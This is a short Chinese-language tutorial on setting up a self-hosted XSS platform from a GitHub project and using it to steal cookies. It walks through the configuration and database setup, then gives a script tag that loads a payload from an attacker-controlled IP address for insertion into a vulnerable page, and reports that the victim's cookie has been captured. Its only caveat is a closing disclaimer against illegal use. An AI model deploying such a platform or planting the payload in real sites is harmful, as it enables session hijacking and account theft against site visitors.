一、下载平台源码、拷贝到我们网站的根目录
https://github.com/anwilx/xss_platform
二、修改相关参数
1、config.php,数据库用户、密码、还有xss平台的访问路径
2、导入sql文件,测试的时候没法导入,所以就手动创建了数据库
新建数据库
打开xssplatform.sql,将里面的sql语句执行一遍
3、更新站点域名,将作者的域名替换,一共有四处
将module模块里"http://xsser.me"替换为"http://www.aiyouxss.com/xss");
4、修改authtest文件
三、平台利用
1、注册一个账户
2、创建一个项目
3、配置相关信息,根据需要,添加模块
4、复制script里面代码,插入到存在xss漏洞的页面
<script src=http://192.168.139.129/xss/E3vbsa></script>
5、打开xss平台,已获取对方cookie
禁止非法,后果自负
